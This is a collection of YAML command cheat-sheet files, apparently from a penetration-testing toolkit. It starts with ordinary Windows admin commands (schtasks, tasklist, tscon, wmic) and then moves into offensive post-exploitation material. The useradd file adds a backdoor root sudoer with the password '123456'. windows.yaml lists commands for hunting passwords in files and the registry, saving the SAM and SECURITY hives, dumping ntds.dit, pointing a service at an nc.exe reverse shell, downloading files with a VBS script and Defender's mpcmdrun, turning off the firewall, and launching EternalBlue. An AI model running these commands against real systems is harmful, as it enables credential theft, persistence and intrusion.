  # The following command schedules the MyApp program to run every hour, starting five minutes after midnight. Because the /mo parameter is omitted, the command uses the default for an hourly schedule, which is every (1) hour. If the command is issued after 12:05 A.M., the program will not run until the next day.

  schtasks /create /sc hourly /st 00:05:00 /tn "My App" /tr C:\Windows\program.exe

  # Schedule a command to run every five hours
  # The following command schedules the MyApp program to run every five hours, starting on the first day of March 2001. It uses the /mo parameter to specify the interval and the /sd parameter to specify the start date. Because no start time is specified, the current time is used as the start time.

  schtasks /create /sc hourly /mo 5 /sd 03/01/2001 /tn "My App" /tr c:\apps\myapp.exe

  # Query a specific scheduled task

  schtasks /query /tn "\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck" /FO LIST /V

  # Delete a scheduled task

  schtasks /delete /tn "My App"

  # Disable a scheduled task

  schtasks /change /tn "My App" /disable

  # If the column resources cannot be loaded, change the code page with chcp 65001
--------------------------------------------------------------------------------
/files/Windows/tasklist.yaml:
--------------------------------------------------------------------------------
name: tasklist
tags: [tasklist,task]
data: |


  # List currently running processes, excluding those owned by NT AUTHORITY\SYSTEM

  tasklist /fi "USERNAME ne NT AUTHORITY\SYSTEM" /fi "STATUS eq running"

  # All tasks with a process ID greater than 1000, displayed in CSV format

12 | tasklist /v /fi "PID gt 1000" /fo csv 13 | 14 | # 列出lsass.exe的 PID 15 | 16 | tasklist /fi "IMAGENAME eq lsass.exe" /fo list 17 | 18 | # 列出远程计算机上的进程列表 19 | 20 | tasklist /s /u Domain\user /p P@ssw0rd 21 | 22 | 23 | 24 | /fo {table | list | csv} 指定要用于输出的格式。 有效值为 table、 list 和 csv。 输出的默认格式为 table。 25 | /fi 筛选器表达式 26 | 27 | 筛选器名称 有效的运算符 有效值 (s) 28 | STATUS eq、ne RUNNING | NOT RESPONDING | UNKNOWN. 如果指定远程系统,则不支持此筛选器。 29 | IMAGENAME eq、ne 映像名称 30 | PID eq、ne、gt、lt、ge、le PID 值 31 | SESSION eq、ne、gt、lt、ge、le 会话号 32 | SESSIONNAME eq、ne “会话名称” 33 | CPUtime eq、ne、gt、lt、ge、le 采用 HH: MM: SS 格式的 CPU 时间,其中 MM 和 SS 介于0到59之间, HH 是任意无符号数字 34 | MEMUSAGE eq、ne、gt、lt、ge、le 内存使用量(KB) 35 | USERNAME eq、ne 任何有效用户名 () 36 | SERVICES eq、ne 服务名称 37 | WINDOWTITLE eq、ne 窗口标题。 如果指定远程系统,则不支持此筛选器。 38 | MODULES eq、ne DLL 名称 39 | 40 | -------------------------------------------------------------------------------- /files/Windows/tscon.yaml: -------------------------------------------------------------------------------- 1 | name: tscon 2 | tags: [tscon,con] 3 | data: | 4 | 5 | # 切换远程桌面会话 6 | 7 | tscon { | } [/dest:] [/password: | /password:*] [/v] 8 | 9 | # 切换Session ID 为 2 的桌面会话 10 | 11 | tscon 2 12 | 13 | # 切换到Session ID 为 2 的桌面会话,并传入凭据 14 | 15 | tscon 2 /password:mypass 16 | -------------------------------------------------------------------------------- /files/Windows/tskill.yaml: -------------------------------------------------------------------------------- 1 | name: tskill 2 | tags: [tskill,kill] 3 | data: | 4 | 5 | # 切换远程桌面会话 6 | 7 | tskill { | } [/server:] [/id: | /a] [/v] 8 | 9 | # 结束PID为6543的进程 10 | 11 | tskill 6543 12 | 13 | # 结束进程名为Name.exe的进程 14 | 15 | tskill Name.exe 16 | -------------------------------------------------------------------------------- /files/Windows/useradd.yaml: -------------------------------------------------------------------------------- 1 | name: useradd 2 | tags: [useradd,adduser,linux] 3 | data: | 4 | 5 | # 添加root用户 6 | 7 | useradd abc && echo "123456" | 
passwd --stdin abc 8 | 9 | usermod -g root abc 10 | 11 | chmod 0440 /etc/sudoers 12 | 13 | echo "abc ALL=(ALL:ALL) ALL" >> /etc/sudoers 14 | 15 | -------------------------------------------------------------------------------- /files/Windows/windows.yaml: -------------------------------------------------------------------------------- 1 | name: windows 2 | tags: [windows] 3 | data: | 4 | 5 | get info system 6 | ``` 7 | systeminfo 8 | ``` 9 | 10 | get info system limited 11 | ``` 12 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 13 | ``` 14 | 15 | find passwords 16 | ``` 17 | findstr /si 'password' *.txt *.xml *.docx 18 | ``` 19 | 20 | find passwords - group policy preference (ms14-025) 21 | ``` 22 | findstr /S /I cpassword \\\sysvol\\policies\*.xml 23 | ``` 24 | 25 | get patchs 26 | ``` 27 | wmic qfe get Caption,Description,HotFixID,InstalledOn 28 | ``` 29 | 30 | get hostname 31 | ``` 32 | hostname 33 | ``` 34 | 35 | show environment - List all environment variables 36 | ``` 37 | set 38 | ``` 39 | 40 | dns request for DC 41 | ``` 42 | nslookup -type=any . 
43 | ``` 44 | 45 | show mounted disks 46 | ``` 47 | wmic logicaldisk get caption,description,providername 48 | ``` 49 | 50 | show recyle bin 51 | ``` 52 | dir C:\$Recycle.Bin /s /b 53 | ``` 54 | 55 | get architecture 56 | ``` 57 | wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 58 | ``` 59 | 60 | list scheduled tasks 61 | ``` 62 | schtasks /query /fo LIST /v 63 | ``` 64 | 65 | list one scheduled task 66 | ``` 67 | schtasks /query /fo LIST 2>nul | findstr 68 | ``` 69 | 70 | list process 71 | ``` 72 | tasklist /V 73 | ``` 74 | 75 | list process and links to started services 76 | ``` 77 | tasklist /SVC 78 | ``` 79 | 80 | list windows service started (1) 81 | ``` 82 | net start 83 | ``` 84 | 85 | list services (2) 86 | ``` 87 | wmic service list brief 88 | ``` 89 | 90 | list services (3) 91 | ``` 92 | sc query List of services 93 | ``` 94 | 95 | list installed software (1) 96 | ``` 97 | dir /a "C:\Program Files" 98 | ``` 99 | 100 | list installed software (2) 101 | ``` 102 | dir /a "C:\Program Files (x86)" 103 | ``` 104 | 105 | list installed software (3) 106 | ``` 107 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 108 | ``` 109 | 110 | register query word password (1) 111 | ``` 112 | reg query HKLM /f password /t REG_SZ /s 113 | ``` 114 | 115 | register query word password (2) 116 | ``` 117 | reg query HKCU /f password /t REG_SZ /s 118 | ``` 119 | 120 | register query extract same 121 | 122 | When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them. 
123 | 124 | ``` 125 | reg save HKLM\SAM 'C:\Windows\Temp\sam.save' 126 | reg save HKLM\SECURITY 'C:\Windows\Temp\security.save' 127 | reg save HKLM\SYSTEM 'C:\Windows\Temp\system.save' 128 | ``` 129 | 130 | check service privilege 131 | ``` 132 | accesschk.exe /accepteula -ucqv 133 | ``` 134 | 135 | reconfigure service 136 | ``` 137 | sc config binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe" 138 | ``` 139 | 140 | change service 141 | ``` 142 | sc config obj= ".\LocalSystem" password= "" 143 | ``` 144 | 145 | start service 146 | ``` 147 | net start 148 | ``` 149 | 150 | check permission (1) 151 | ``` 152 | accesschk.exe /accepteula -dqv "" 153 | ``` 154 | 155 | check permission (2) 156 | ``` 157 | cacls "" 158 | ``` 159 | 160 | find weak folder permission 161 | ``` 162 | accesschk.exe -uwdqs Users :\ 163 | ``` 164 | 165 | find weak file permission 166 | ``` 167 | accesschk.exe -uwqs Users :\ 168 | ``` 169 | 170 | % windows, download 171 | 172 | VBS download file script 173 | cat/ATTACK/FILE_TRANSFERT 174 | ``` 175 | echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();WScript.Echo(WinHttpReq.ResponseText); > fu.js && cscript /nologo fu.js > 176 | ``` 177 | 178 | % windows, users 179 | 180 | add user 181 | cat/PERSIST 182 | ``` 183 | net user /ADD 184 | ``` 185 | 186 | add user to domain 187 | cat/PERSIST 188 | ``` 189 | net user /ADD /DOMAIN 190 | ``` 191 | 192 | add user as admin 193 | cat/PERSIST 194 | ``` 195 | net localgroup administrators /add 196 | ``` 197 | 198 | run as over user 199 | cat/PRIVESC 200 | ``` 201 | runas /user:\ cmd.exe 202 | ``` 203 | 204 | whoami - All info about me, take a look at the enabled tokens 205 | cat/PRIVESC 206 | ``` 207 | whoami /all 208 | ``` 209 | 210 | whoami privilegied 211 | cat/PRIVESC 212 | ``` 213 | whoami /priv Show only privileges 214 | ``` 215 | 216 | list all users 217 | cat/PRIVESC 218 | ``` 219 | 
net users 220 | ``` 221 | 222 | list domain admins (fr) 223 | plateform/windows #target/local #cat/RECON 224 | ``` 225 | net group "Admins du domaine" 226 | ``` 227 | 228 | infos about a user 229 | cat/RECON 230 | ``` 231 | net user 232 | ``` 233 | 234 | infos about password policy 235 | cat/RECON 236 | ``` 237 | net accounts 238 | ``` 239 | 240 | who logged in 241 | cat/PRIVESC 242 | ``` 243 | qwinsta 244 | ``` 245 | 246 | List credentials 247 | cat/POSTEXPLOIT/CREDS_RECOVER 248 | ``` 249 | cmdkey /list 250 | ``` 251 | 252 | show local groups 253 | cat/RECON 254 | ``` 255 | net localgroup 256 | ``` 257 | 258 | show specific local group 259 | ``` 260 | net localgroup 261 | ``` 262 | 263 | show domain groups 264 | ``` 265 | net group /domain 266 | ``` 267 | 268 | show domain group users 269 | ``` 270 | net group /domain 271 | ``` 272 | 273 | % windows, domain infos 274 | 275 | get domain name 276 | ``` 277 | echo %USERDOMAIN% 278 | ``` 279 | 280 | get domain name (2) 281 | ``` 282 | echo %USERDNSDOMAIN% 283 | ``` 284 | 285 | get computer domain name (3) 286 | ``` 287 | systeminfo | findstr /B /C:"Domain" 288 | ``` 289 | 290 | get name of the DC 291 | ``` 292 | echo %logonserver% 293 | ``` 294 | 295 | get name of the dc (2) 296 | ``` 297 | set logonserver Get name of the domain controller 298 | ``` 299 | 300 | list of domain groups 301 | ``` 302 | net groups /domain 303 | ``` 304 | 305 | list of computer connected to the domain 306 | ``` 307 | net group "domain computers" /domain 308 | ``` 309 | 310 | List all PCs of the domain 311 | ``` 312 | net view /domain 313 | ``` 314 | 315 | # list domain controllers 316 | ``` 317 | nltest /dclist: 318 | ``` 319 | 320 | list pc accounts of domain controllers 321 | ``` 322 | net group "Domain Controllers" /domain 323 | ``` 324 | 325 | List users with domain admin privileges 326 | ``` 327 | net group "Domain Admins" /domain 328 | ``` 329 | 330 | List users that belongs to the administrators group inside the domain 331 | ``` 332 
| net localgroup administrators /domain 333 | ``` 334 | 335 | List all domain users 336 | ``` 337 | net user /domain 338 | ``` 339 | 340 | get user domain information 341 | ``` 342 | net user /domain 343 | ``` 344 | 345 | domain password and lockout policy 346 | ``` 347 | net accounts /domain 348 | ``` 349 | 350 | get mapping of the trust relationships 351 | ``` 352 | nltest /domain_trust 353 | ``` 354 | 355 | % windows, network 356 | all interfaces 357 | ``` 358 | ipconfig /all 359 | ``` 360 | 361 | print all routes 362 | ``` 363 | route print 364 | ``` 365 | 366 | list of know hosts 367 | ``` 368 | arp -a 369 | ``` 370 | 371 | # list open ports 372 | ``` 373 | netstat -ano 374 | ``` 375 | 376 | show hosts file 377 | ``` 378 | type C:\WINDOWS\System32\drivers\etc\hosts 379 | ``` 380 | 381 | % windows, dir 382 | 383 | list hidden files 384 | ``` 385 | dir /a:h 386 | ``` 387 | 388 | Recursive list 389 | ``` 390 | dir /s /b 391 | ``` 392 | 393 | % windows, firewall 394 | show firewall state 395 | ``` 396 | netsh firewall show state 397 | ``` 398 | 399 | show firewall config 400 | ``` 401 | netsh firewall show config 402 | ``` 403 | 404 | turn off firewall 405 | ``` 406 | NetSh Advfirewall set allprofiles state off 407 | ``` 408 | 409 | turn off firewall (2) 410 | ``` 411 | netsh firewall set opmode disable 412 | ``` 413 | 414 | turn on firewall 415 | ``` 416 | NetSh Advfirewall set allprofiles state on 417 | ``` 418 | 419 | firewall open port RDP 420 | ``` 421 | netsh firewall add portopening TCP 3389 "Remote Desktop" 422 | ``` 423 | 424 | % windows, ntds.dit 425 | dump ntds.dit 426 | ``` 427 | ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q 428 | ``` 429 | 430 | % windows, smb, share 431 | list of computer 432 | ``` 433 | net view 434 | ``` 435 | 436 | list of computer shares on the domain 437 | ``` 438 | net view /all /domain 439 | ``` 440 | 441 | list share of a computer 442 | ``` 443 | net view \\ \ALL 444 | ``` 445 | 446 | mount share locally 447 | ``` 448 
| net use x: \\\ 449 | ``` 450 | 451 | check current share 452 | ``` 453 | net share 454 | ``` 455 | 456 | % windows, file, download 457 | windows download file with windows defender 458 | ``` 459 | "c:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\mpcmdrun.exe" -DownloadFile -url -path 460 | ``` 461 | 462 | windows download file with windows defender 463 | ``` 464 | mpcmdrun.exe -DownloadFile -url -path 465 | ``` 466 | 467 | % windows, active directory, dns 468 | 469 | find AD IP - show domain name and dns 470 | ``` 471 | nmcli dev show 472 | ``` 473 | 474 | nslookup AD - domain 475 | ``` 476 | nslookup -type=SRV _ldap._tcp.dc._msdcs. 477 | ``` 478 | 479 | % windows, cve 480 | windows eternal blue - smb - ms17-010 481 | ``` 482 | msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue" 483 | ``` 484 | 485 | = interface: eth0 486 | -------------------------------------------------------------------------------- /files/Windows/wmic.yaml: -------------------------------------------------------------------------------- 1 | name: wmic 2 | tags: [wmic,wmi] 3 | data: | 4 | 5 | # 查看进程列表 6 | 7 | wmic process list full 8 | 9 | wmic process get Name,ExecutablePath 10 | 11 | --------------------------------------------------------------------------------